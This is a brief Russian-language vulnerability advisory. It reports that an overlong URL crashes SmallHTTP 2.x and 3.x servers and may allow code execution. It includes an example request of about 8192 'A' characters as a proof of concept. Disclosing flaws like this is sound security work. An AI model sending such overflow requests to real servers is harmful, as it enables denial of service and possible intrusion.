Очень длинный URL в small HTTP сервере приводит к отказу от обслуживания с возможностью выполнить потенциально опасный код на сервере.
Уязвимость найдена в SmallHTTP versions 2.x и SmallHTTP versions 3.x (Latest beta 8):
Пример:
GET /AAA...AAA (8192) HTTP/1.0
Accept: ...
Host: ...
